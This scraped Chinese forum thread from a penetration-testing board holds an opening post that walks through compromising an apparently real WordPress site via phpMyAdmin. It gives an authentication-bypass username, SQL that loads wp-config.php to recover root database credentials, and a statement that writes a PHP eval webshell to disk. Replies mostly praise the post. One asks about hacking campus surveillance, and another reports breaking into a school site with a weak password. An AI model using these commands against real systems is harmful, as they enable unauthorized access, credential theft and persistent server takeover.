网页资讯视频图片知道文库贴吧地图采购
进入贴吧全吧搜索

 
 
 
日一二三四五六
       
       
       
       
       
       

签到排名:今日本吧第个签到,

本吧因你更精彩,明天继续来努力!

本吧签到人数:0

一键签到
成为超级会员,使用一键签到
一键签到
本月漏签0次!
0
成为超级会员,赠送8张补签卡
如何使用?
点击日历上漏签日期,即可进行补签。
连续签到:天  累计签到:天
0
超级会员单次开通12个月以上,赠送连续签到卡3张
使用连续签到卡
07月25日漏签0天
渗透吧 关注:78,945贴子:613,142
  • 看贴

  • 图片

  • 吧主推荐

  • 游戏

  • 1 2 3 4 下一页 尾页
  • 122回复贴,共4页
  • ,跳到 页  
<<返回渗透吧
>0< 加载中...

【实战贴】帮助渗透吧友phpmyadmin低权限拿shell

  • 只看楼主
  • 收藏

  • 回复
  • 轻音
  • 初二年级
    11
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼

xxxx.xxx/phpmyadmin/(pa度娘)
可以使用万能密码进入 低版本的phpmyadmin存在此漏洞
利用方法:用户名处写入‘localhost’@'@”则登录成功。 (注意全部是英文标点符号,最后一个为英文双引号)

直接写马?想都别想!!!
万能密码进入的一般权限都是非常低,但是却有读文件的权限。
为什么要读文件?找到网站配置文件,说不定当前网站的数据库用户有权限写马。
如果不能写马,也可以看到后台用户,进入后台拿shell。
现在就是想办法搞绝对路径了
刚要开始找吧友跟我说他有绝对路径这就简单多了 - -
如果没有绝对路径,一般也是可以读取配置文件什么的获取到
或者phpmyadmin报错啊什么的

c:\xampp\htdocs\wavegoing\ 网站绝对路径
c:\xampp\phpmyadmin\ phpmyadmin路径
在扫目录的时候,我发现了网站使用的是WordPress程序

WordPress的配置文件是在wp-config.php
那么我就要读取这个文件的内容
c:\xampp\htdocs\wavegoing\wp-config.php
读文件语句select load_file('c:\xampp\htdocs\wavegoing\wp-config.php');
直接读文件是空的,我也不知道是为什么,但是好几回phpmyadmin拿shell,直接读文件都是这样子。

另外一个思路。Mysql可以把指定的文件写进表
CREATE TABLE `test`.`a` (`a1` TEXT NOT NULL ); //在test这个库创建一个表名为a字段名为a1的表。

load data local infile 'c:\xampp\htdocs\wavegoing\wp-config.php'into table a; //把c:\xampp\htdocs\wavegoing\wp-config.php写入到表名为a的表

可以看到斜杠被去掉了那就这样写路径
load data local infile 'c:\\xampp\\htdocs\\wavegoing\\wp-config.php'into table a;
成功写入

去查看一下内容。
为什么会出现这个?好吧我也不知道,我也没学过数据库啊!!!

尝试导出到本地查看。选择text格式


看来我人品还是相当滴好啊
root用户

使用root登录,执行sql语句
select '<?php @eval($_POST[1])?>'INTO OUTFILE 'c:\\xampp\\phpmyadmin\\c.php'


期间遇到的就是网站绝对路径写php一直写入失败txt却可以
所以我换成了phpmyadmin的路径,写入成功。
最近渗透吧不太活跃,实战文章也是越来越少。此贴上30楼继续提权
就这样吧希望大家不要搞破坏。


  • 轻音
  • 初二年级
    11
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
@Dimwi0d @额___你懂的 能申精否 写了半天啊!!!


2025-07-25 05:13:37
广告
不感兴趣
开通SVIP免广告
  • 渗透_油哥
  • 四年级
    7
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
给你一个滑稽


  • 同人音声贩卖
  • 五年级
    8
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
代码审计什么的不解释很难懂


  • 825240805
  • 学前班
    3
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
哥们能入侵校园监控么?


  • 好莱坞的凉皮
  • 初二年级
    11
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
支持


  • 最终boss
  • 初二年级
    11
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
6666666


  • 无为大龄青年
  • 初二年级
    11
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
我来顶一下,学习了


2025-07-25 05:07:37
广告
不感兴趣
开通SVIP免广告
  • 李临程
  • 托儿所
    1
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
谢谢!这篇文章很有帮助!


  • 来自地狱修罗者
  • 六年级
    9
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
能不能改网址,让服务器识别的是一个网址,实际自己登陆的是另外一个网址


  • 0我在这里0
  • 三年级
    6
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
虽然看不懂,


  • 超能man用超能
  • 四年级
    7
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
谢谢分享!


  • 急迫的小青年
  • 学前班
    3
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
支持实战贴


  • a52669721
  • 学前班
    3
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
楼主握个手,我学校主站也是phpmyadmin的,直接弱口令进去了


2025-07-25 05:01:37
广告
不感兴趣
开通SVIP免广告
  • yangswsw
  • 一年级
    4
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
棒


登录百度账号

扫二维码下载贴吧客户端

下载贴吧APP
看高清直播、视频!
  • 贴吧页面意见反馈
  • 违规贴吧举报反馈通道
  • 贴吧违规信息处理公示
  • 1 2 3 4 下一页 尾页
  • 122回复贴,共4页
  • ,跳到 页  
<<返回渗透吧
分享到:
©2025 Baidu贴吧协议|隐私政策|吧主制度|意见反馈|网络谣言警示